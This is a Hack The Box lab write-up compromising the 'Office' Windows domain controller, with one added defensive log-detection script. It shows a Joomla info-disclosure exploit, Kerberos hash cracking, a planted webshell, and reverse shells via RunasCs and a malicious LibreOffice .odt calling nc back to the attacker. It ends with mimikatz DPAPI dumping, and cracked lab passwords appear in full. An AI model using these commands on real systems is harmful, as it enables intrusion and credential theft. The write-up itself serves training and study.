# HTB - Office

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FIOTZQxY02ZHsIhdYLanR%2FOffice.png?alt=media&#x26;token=17bb9995-38e8-40c3-8c93-e8a0f19da5dd" alt=""><figcaption></figcaption></figure>

## Machine Info

Office is a hard-difficulty Windows machine featuring various vulnerabilities including Joomla web application abuse, PCAP analysis to identify Kerberos credentials, abusing a LibreOffice vulnerability, abusing MSKRP to dump DPAPI credentials and abusing Group Policies due to excessive Active Directory privileges.

## Enumeration

**Scope**

> IP Address: 10.10.11.3

**Nmap Scan**

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn 

PORT     STATE SERVICE          REASON
53/tcp   open  domain           syn-ack
80/tcp   open  http             syn-ack
139/tcp  open  netbios-ssn      syn-ack
443/tcp  open  https            syn-ack
445/tcp  open  microsoft-ds     syn-ack
593/tcp  open  http-rpc-epmap   syn-ack
3268/tcp open  globalcatLDAP    syn-ack
3269/tcp open  globalcatLDAPssl syn-ack
5985/tcp open  wsman            syn-ack
9389/tcp open  adws             syn-ack

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap  -sU -p1-10000 --min-rate 10000 $ip -Pn 

PORT    STATE SERVICE
53/udp  open  domain
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Reel2]
└─$ nmap -p53,80,139,443,445,593,3268,3269,5985,9389 -sCV $ip -oN Nmap/script-scan

PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
80/tcp   open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
|_http-generator: Joomla! - Open Source Content Management
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp  open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
445/tcp  open  microsoft-ds?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:42+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-07-14T17:06:43+00:00; +8h00m10s from scanner time.
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Hosts: www.example.com, DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-07-14T17:06:04
|_  start_date: N/A
|_clock-skew: mean: 8h00m09s, deviation: 0s, median: 8h00m09s
```

```
* Open ports: 53,80,139,443,445,593,3268,3269,5985,9389
* UDP open ports: 53,88,123,389
* Services: DNS - HTTP - HTTPS - SMB - KERBEROS - LDAP - winRM
* Versions: Apache httpd 2.4.56 - OpenSSL/1.1.1t - PHP/8.0.28
* Important notes: 
	http-robots.txt: 16 disallowed entries (15 shown)
	http-generator:Joomla! - Open Source Content Management
	Domain: office. - DNS:DC.office.htb
```

**HTTPS Enumeration**

When visiting `https://10.10.11.3/`, it gives me a `Forbidden` message

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FNhqS3lFFFNmXdGU9Y5Pr%2FPasted%20image%2020240714120631.png?alt=media&#x26;token=31703a98-2807-43d8-aaa9-0596ae03f466" alt=""><figcaption></figcaption></figure>

**SMB Enumeration**

Nothing from SMB

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FIOT0dna00QB40yqjo0fI%2FPasted%20image%2020240714121316.png?alt=media&#x26;token=1f6e841e-328b-49a0-9175-d404a475e565" alt=""><figcaption></figcaption></figure>

**KERBEROS Enumeration**

Found some users with `kerbrute` and the `jsmith.txt` wordlist

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FTebqe3ef8XGXo0TIDk5k%2FPasted%20image%2020240714121556.png?alt=media&#x26;token=9ce612e7-3644-4cec-870c-2a26218bdb70" alt=""><figcaption></figcaption></figure>

Additional users found when using the `xato-10-million` wordlist

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FkCs6Fg82ri9027JfDHTz%2FPasted%20image%2020240714121827.png?alt=media&#x26;token=70a45c52-6d42-4bbc-9bd3-037efa38a204" alt=""><figcaption></figcaption></figure>

I added all the users found to a wordlist and then tried an `ASREPROASTING` attack, but it failed

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FYG5aVgy3UbNns0DaKMmh%2FPasted%20image%2020240714122512.png?alt=media&#x26;token=f36eda7c-8786-4b77-9c44-d5d9acd7bee4" alt=""><figcaption></figcaption></figure>

**HTTP Enumeration**

`http://10.10.11.3/`

The site is a `joomla` CMS

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FzCvaTeIGKQhAHK7aq7zl%2FPasted%20image%2020240714120729.png?alt=media&#x26;token=183033a6-5dbf-4892-b95a-dfdca941f087" alt=""><figcaption></figcaption></figure>

I visited `http://10.10.11.3/readme.txt` to get the version and search for a CVE for it

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://10.10.11.3/readme.txt | grep -i version

 * Joomla! 4.2 version history - https://docs.joomla.org/Special:MyLanguage/Joomla_4.2_version_history
<snip>
```

I found that this version is affected by an unauthenticated information disclosure vulnerability

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FnTvouyYAlbV191t6IIJ9%2FPasted%20image%2020240714124106.png?alt=media&#x26;token=e13afe11-6067-4a91-ac22-d9c34b776efc" alt=""><figcaption></figcaption></figure>

I started `Metasploit`, searched for an exploit with the CVE number and found one

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ msfconsole -q

msf6 > search CVE-2023-23752

Matching Modules
================
   #  Name                                                      Disclosure Date  Rank    Check  Description                                                
   -  ----                                                      ---------------  ----    -----  -----------                                                
   0  auxiliary/scanner/http/joomla_api_improper_access_checks  2023-02-01       normal  Yes    Joomla API Improper Access Checks                          

msf6 > use 0
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > options                                                                                  
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-me                         
                                         tasploit.html                                                                                                     
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI of the Joomla Application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   VHOST                       no        HTTP server virtual host            

msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > set rhosts 10.10.11.3
msf6 auxiliary(scanner/http/joomla_api_improper_access_checks) > run

[+] Users JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.users_565355.bin
[+] Joomla Users
============

 ID   Super User  Name        Username       Email                   Send Email  Register Date      Last Visit Date    Group Names
 --   ----------  ----        --------       -----                   ----------  -------------      ---------------    -----------
 474  *           Tony Stark  Administrator  Administrator@holograp  1           2023-04-13 23:27:  2024-01-24 13:00:  Super Users
                                             hy.htb                              32                 47

[+] Config JSON saved to /home/kali/.msf4/loot/20240714053806_default_10.10.11.3_joomla.config_217752.bin
[+] Joomla Config
=============

 Setting        Value
 -------        -----
 db encryption  0
 db host        localhost
 db name        joomla_db
 db password    H0lOgrams4reTakIng0Ver754!
 db prefix      if2tx_
 db user        root
 dbtype         mysqli

[*] Scanned 1 of 1 hosts (100% complete)
```

We get database credentials:

```
 db host        localhost
 db name        joomla_db
 db password    H0lOgrams4reTakIng0Ver754!
 db user        root
```
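Added example, not part of the original writeup: a small Python detector for CVE-2023-23752 probes in Apache access logs. It matches requests to the Joomla 4 web-services endpoints this CVE exposes without authentication, `/api/index.php/v1/config/application` and `/api/index.php/v1/users` with `public=true` (the config and user data shown in the module output above), and treats an HTTP 200 on them as a confirmed disclosure. The log lines and client addresses are constructed for the example, and the log format assumed is Apache's combined format.

```python
import re
from collections import defaultdict

# Apache "combined" access log line, e.g.
# 10.10.16.7 - - [14/Jul/2024:05:38:06 +0000] "GET /path HTTP/1.1" 200 1234 "-" "UA"
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Joomla 4 web-services endpoints that CVE-2023-23752 lets an unauthenticated
# client read when the request carries public=true.
SENSITIVE_API = re.compile(
    r'^/api/index\.php/v1/(?:config/application|users)(?:[/?]|$)', re.IGNORECASE
)


def parse_line(line):
    """Return the fields of one access-log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_cve_2023_23752_probe(entry):
    """True when the request targets a sensitive API path with public=true in the query."""
    path = entry["path"]
    if not SENSITIVE_API.match(path):
        return False
    query = path.partition("?")[2].lower()
    return "public=true" in query.split("&")


def scan_logs(lines):
    """Group matching requests by client address: {ip: [(path, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        entry = parse_line(line)
        if entry and is_cve_2023_23752_probe(entry):
            hits[entry["ip"]].append((entry["path"], int(entry["status"])))
    return dict(hits)


def confirmed_leaks(hits):
    """Clients that got an HTTP 200 from a sensitive endpoint, i.e. data was actually returned."""
    return sorted(ip for ip, reqs in hits.items() if any(status == 200 for _, status in reqs))


# Constructed sample log lines (not from the target). The first two mimic a successful
# disclosure of the application config and the user list, the third a rejected probe,
# the rest ordinary traffic that must not alert.
SAMPLE_LOG = [
    '10.10.16.7 - - [14/Jul/2024:05:38:06 +0000] "GET /api/index.php/v1/config/application?public=true HTTP/1.1" 200 1502 "-" "Mozilla/5.0"',
    '10.10.16.7 - - [14/Jul/2024:05:38:06 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 200 611 "-" "Mozilla/5.0"',
    '10.10.16.9 - - [14/Jul/2024:05:40:12 +0000] "GET /api/index.php/v1/users?public=true HTTP/1.1" 401 0 "-" "curl/8.0.1"',
    '192.168.1.5 - - [14/Jul/2024:05:41:00 +0000] "GET /index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',
    '192.168.1.6 - - [14/Jul/2024:05:42:00 +0000] "GET /api/index.php/v1/users HTTP/1.1" 401 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    found = scan_logs(SAMPLE_LOG)
    for ip, reqs in found.items():
        print(ip, reqs)
    print("confirmed disclosure from:", confirmed_leaks(found))
```

On a XAMPP install like this one the file to feed in is the default `C:\xampp\apache\logs\access.log`. Non-200 responses are still recorded per client so that repeated probing stays visible, while `confirmed_leaks` narrows the alert to clients that actually received the config or user data.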

Since I got the `joomla` username but still don't know the password, I will reuse the database password I found against the web login form and the users we found before

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FLEjzU7t5hee3CGbefx9b%2FPasted%20image%2020240714125414.png?alt=media&#x26;token=56de3faa-070f-42ec-8051-9e119d597c01" alt=""><figcaption></figcaption></figure>

* Let's begin enumerating the domain with these credentials. I will do the following:
  * Run `Bloodhound Ingestors`
  * Enumerate the shares
  * Search for kerberoastable accounts

1. Run `bloodhound.py` to collect info and feed it into the BloodHound GUI

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ bloodhound-python -u 'dwolfe' -p 'H0lOgrams4reTakIng0Ver754!' -ns $ip -d office.htb -c all

<snip>
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.office.htb
INFO: Done in 00M 21S
```

Start `crackmapexec` to view the shares and the permissions on them

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FZqpWxbmYHoBoSTUwK8Mg%2FPasted%20image%2020240714130339.png?alt=media&#x26;token=5297ce04-1b72-4d43-8f16-d184db131f26" alt=""><figcaption></figcaption></figure>

I ran the `spider_plus` module against the shares to explore their contents quickly

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ crackmapexec smb $ip -u dwolfe -p 'H0lOgrams4reTakIng0Ver754!' -M spider_plus
SMB         10.10.11.3      445    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754! 
SPIDER_P... 10.10.11.3      445    DC               [*] Started spidering plus with option:
SPIDER_P... 10.10.11.3      445    DC               [*]        DIR: ['print$']
SPIDER_P... 10.10.11.3      445    DC               [*]        EXT: ['ico', 'lnk']
SPIDER_P... 10.10.11.3      445    DC               [*]       SIZE: 51200
SPIDER_P... 10.10.11.3      445    DC               [*]     OUTPUT: /tmp/cme_spider_plus
```

I found a `.pcap` file in the `SOC Analysis` share, so I will download it and examine it locally

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ cat /tmp/cme_spider_plus/10.10.11.3.json

<snip>
    "SOC Analysis": {
        "Latest-System-Dump-8fbc124d.pcap": {
            "atime_epoch": "2023-05-07 20:59:54",
            "ctime_epoch": "2023-05-07 20:59:54",
            "mtime_epoch": "2023-05-10 14:51:42",
            "size": "1.31 MB"
        } 
<snip>

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ smbclient -U dwolfe \\\\$ip\\'SOC Analysis'         
Password for [WORKGROUP\dwolfe]:

smb: \> ls
  .                                   D        0  Wed May 10 14:52:24 2023
  ..                                DHS        0  Wed Feb 14 05:18:31 2024
  Latest-System-Dump-8fbc124d.pcap      A  1372860  Sun May  7 20:59:00 2023

smb: \> get Latest-System-Dump-8fbc124d.pcap 
```

### **Shell as web\_account**

Start `Wireshark` to examine the file

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ wireshark Latest-System-Dump-8fbc124d.pcap 
```

After examining the capture in `wireshark`, only two packets caught my attention:

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FWRMNZ7Q3RXRfttECSUkp%2FPasted%20image%2020240714140216.png?alt=media&#x26;token=a8fe63e4-0530-42af-abcd-a371a4405faa" alt=""><figcaption></figcaption></figure>

The second packet contains the cipher, which is encrypted with the NTLM hash of the user requesting Kerberos authentication, and the username `tstark` too.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FCD4h0XOjIqFVLmAAHnKL%2FPasted%20image%2020240714140457.png?alt=media&#x26;token=bf540dfe-f82e-4943-8424-878f8f8d11d0" alt=""><figcaption></figcaption></figure>

Following this post

{% embed url="<https://vbscrub.com/2020/02/27/getting-passwords-from-kerberos-pre-authentication-packets>" %}

I can construct the Kerberos hash so that I can crack it with hashcat

```
$<kerberos 5 pre-auth>$<encryption type>$<username>$<domain-name>$cipher

$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ hashcat -m 19900 kerberos.hash /usr/share/wordlists/rockyou.txt

<snip>
$krb5pa$18$tstark$office.htb$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

Session..........: hashcat
Status...........: Cracked
```

I tried this password on the `joomla` admin panel as administrator because the CVE we found showed that the administrator account has the name `Tony Stark`.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FzoP8w6w64eVsa2PKFs83%2FPasted%20image%2020240714145338.png?alt=media&#x26;token=e04fa071-d7da-476c-9e25-31af8fe34a0f" alt=""><figcaption></figcaption></figure>

From `HackTricks`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FJp4rShjKj0BLVU39EihZ%2FPasted%20image%2020240714145241.png?alt=media&#x26;token=4d6bcb50-94ee-45e7-a0fc-4444354246d3" alt=""><figcaption></figcaption></figure>

After doing the steps above, I added a webshell and got RCE on the system

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FZhMZO2VwXWsdjKweha8y%2FPasted%20image%2020240714150159.png?alt=media&#x26;token=1e34b62a-d68e-4ac2-a505-c51e786df11d" alt=""><figcaption></figcaption></figure>

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ curl -s http://$ip/administrator/templates/atum/error.php?cmd=whoami
office\web_account
```

I will upgrade the webshell to `p0wny.php` to be more flexible

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FfT4HXvGe1L60Quj65WaQ%2FPasted%20image%2020240714172811.png?alt=media&#x26;token=f5bfd229-078f-41f3-8877-812627c500ef" alt=""><figcaption></figcaption></figure>

I didn't find anything useful in the context of `web_account`, as its home directory is empty, so I uploaded `RunasCs.exe` to get a shell as `tstark`

### **Shell as tstark**

```powershell
.\RunasCs.exe tstark playboy69 PowerShell -r 10.10.16.7:4444

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-9b0db$\Default
[+] Async process 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' with pid 5748 created in background.
```

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 4444

listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 61764

PS C:\Windows\system32> whoami
office\tstark

PS C:\Users\tstark> type Desktop\user.txt
fc7d5bd1f9cf6a3c6xxxxxxxxxxxxxxx
```

> User Flag: fc7d5bd1f9cf6a3c6cxxxxxxxxxxxxxxx

### **Shell as ppotts**

Looking at the listening ports, there is a non-standard port listening

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FPFayGQrflklgZChyIryJ%2FPasted%20image%2020240714185531.png?alt=media&#x26;token=a86b2692-56f7-4e62-b9f1-14c4fc99e0ce" alt=""><figcaption></figcaption></figure>

Looking for the process that owns this port revealed that it is a web server

```powershell
PS C:\xampp\htdocs\internal> tasklist /svc | findstr 4024
httpd.exe                     4024 Apache2.4
```

I uploaded `Chisel` to the machine and mapped this port to my kali machine.

On kali run

```bash
./chisel_1.9.1_linux_amd64 server -p 8443 --reverse
```

On the Windows box run

```powershell
.\c.exe client 10.10.16.7:8443 R:8083:localhost:8083
```

`http://localhost:8083/resume.php`

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2F7luzONqMSWqyrn8Suc7i%2FPasted%20image%2020240714185115.png?alt=media&#x26;token=2ed68429-b759-4192-8ae8-1b3c2dd27ab8" alt=""><figcaption></figcaption></figure>

The web app doesn't accept any file extension except these four: `Doc, Docx, Docm, Odt`.

After I uploaded a `file.odt` to the webapp, it appeared in the `applications` folder under `xampp\htdocs` with a different name

> Note: No file with `.odt` was there before I uploaded my file!!!

```powershell
PS C:\xampp\htdocs\internal> dir applications

    Directory: C:\xampp\htdocs\internal\applications

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/14/2024   4:13 PM          20321 john-it-30-000-0-5-years-john@htb-com.doc                            
-a----         7/14/2024   5:01 PM              0 john-it-30-000-0-5-years-john@htb-com.odt 
```

Checking its permissions, the user `ppotts` has full access to it.

```powershell
PS C:\xampp\htdocs\internal> icacls applications
icacls applications
applications CREATOR OWNER:(OI)(CI)(IO)(F)
             OFFICE\PPotts:(OI)(CI)(NP)(F)
             NT AUTHORITY\SYSTEM:(OI)(CI)(F)
             NT AUTHORITY\LOCAL SERVICE:(OI)(CI)(F)
             OFFICE\web_account:(OI)(CI)(RX,W)
             BUILTIN\Administrators:(OI)(CI)(F)
             BUILTIN\Users:(OI)(CI)(RX)
```

> The community said that there is a CVE affecting `Libreoffice` that can be used to create an `.odt` file and get RCE from it

{% embed url="<https://github.com/elweth-sec/CVE-2023-2255>" %}

```bash
┌──(kali㉿kali)-[~/…/HTB/machines/Office/CVE-2023-2255]
└─$ python3 CVE-2023-2255.py --cmd 'C:\Users\Public\nc.exe 10.10.16.7 8888 -e PowerShell' --output 'exploit.odt'
File exploit.odt has been created !
```

Upload the exploit via webapp

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FSO9O54AyGMjv8ERxJ8bm%2FPasted%20image%2020240714191237.png?alt=media&#x26;token=6fd7024f-2b0e-4c68-90d0-d8cefcbbc8e8" alt=""><figcaption></figcaption></figure>

Get a shell as `ppotts`

```bash
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Office]
└─$ rlwrap nc -lvnp 8888

listening on [any] 8888 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.3] 62159
Windows PowerShell

PS C:\Program Files\LibreOffice 5\program> whoami
office\ppotts
```

There is a `job_offering.ps1` in the Music directory that is responsible for triggering the exploit

```powershell
PS C:\Users\PPotts> type Music\job_offering.ps1

# Specify the path to the directory containing ODT files
$directoryPath = "C:\xampp\htdocs\internal\applications"

# Get all ODT files in the directory
$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt

foreach ($odtFile in $odtFiles) {
    $newFileName = $odtFile.BaseName + "_resume" + $odtFile.Extension
    $destination = Join-Path -Path "c:\xampp\htdocs\internal\applications\" -ChildPath $newFileName
    Copy-Item -Path $odtFile.FullName -Destination $destination -Force
    del C:\xampp\htdocs\internal\applications\$odtFile
}


$odtFiles = Get-ChildItem -Path $directoryPath -Filter *.odt

# Array to store LibreOffice process IDs
$libreOfficeProcessIds = @()

foreach ($odtFile in $odtFiles) {
    # Start LibreOffice to open the ODT file
    Start-Process "C:\Program Files\LibreOffice 5\program\soffice.exe" -ArgumentList "--headless", "--invisible", "--nologo", "--norestore", "--accept=uno:socket,host=localhost,port=8100;urp;StarOffice.ServiceManager", $odtFile.FullName -PassThru | ForEach-Object {
        # Store the process ID for later termination
        $libreOfficeProcessIds = $_.Id

    }

    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 7

    # Wait for LibreOffice processes to finish opening files and then terminate them
    Stop-Process -Id $libreOfficeProcessIds -Force

    # Add a delay (adjust as needed) to ensure LibreOffice has enough time to open the file
    Start-Sleep -Seconds 5

}

Get-ChildItem -Path "c:\xampp\htdocs\internal\applications\" -Force | Remove-Item -Force

# Put the MacroSecurityLevel key back to its original value
reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\LibreOffice\org.openoffice.Office.Common\Security\Scripting\MacroSecurityLevel" /v "Value" /t REG_DWORD /d 3 /f
```

### **Shell as hhogan**

There are stored credentials for `hhogan` in the `ppotts` user's session

```powershell
PS C:\Users\PPotts> cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic 
    User: MyUser
    
    Target: Domain:interactive=office\hhogan
    Type: Domain Password
    User: office\hhogan
```

When I tried to execute commands as that user, it asked for a password

```powershell
PS C:\Users\PPotts> runas /savecred /user:office\hhogan whoami
Enter the password for office\hhogan: 
```

Looking at BloodHound, user `hhogan` is a member of `GPO MANAGERS`, which has the ability to add Group Policy Objects that can be abused to perform malicious actions.

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FDfsmDCLbCZ8zVwIIOk2d%2FPasted%20image%2020240714132358.png?alt=media&#x26;token=d8cade00-bda5-4a7b-8104-c6791d4421eb" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2920983414-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FFXSUK62ihbxooYaV21LB%2Fuploads%2FrqThvJZQIxEmA7qFzLuL%2FPasted%20image%2020240714132539.png?alt=media&#x26;token=ebf6cec9-a4e3-4acf-8420-9b5881f6d841" alt=""><figcaption></figcaption></figure>

As we don't know the password of `hhogan`, we can recover it by decrypting the `DPAPI`-protected credential. We need the master key and credential files, which are located by default in `<user>\AppData\Roaming\Microsoft\Credentials` and `<user>\AppData\Roaming\Microsoft\Protect\<user-sid>\<GUID>`

Credentials files

```powershell
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Credentials

    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Credentials

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4
-a-hs-         7/14/2024   5:18 PM            374 E76CCA3670CD9BB98DF79E0A8D176F1E
```

Master keys

```powershell
PS C:\Users\PPotts> ls -Force AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\

    Directory: C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107

Mode            LastWriteTime         Length Name
----            -------------         ------ ----

-a-hs-         1/17/2024   3:43 PM   740 10811601-0fa9-43c2-97e5-9bef8471fc7d
-a-hs-          5/2/2023   4:13 PM   740 191d3f9d-7959-4b4d-a520-a444853c47eb
-a-hs-         7/14/2024  10:00 AM   740 5f692621-38e9-43bb-ad87-e3ff40ab2720 
```

I uploaded `mimikatz.exe` and began to extract them.

We would normally have to provide a password for the command below, but there is a post from `SpecterOps` that says it can be done without a password: just pass the `/rpc` option to `mimikatz`

<https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107>

```powershell
.\mimikatz.exe "dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb  /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # dpapi::masterkey /in:C:\Users\PPotts\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb  /sid:S-1-5-21-1199398058-4196589450-691661856-1107 /rpc
**MASTERKEYS**
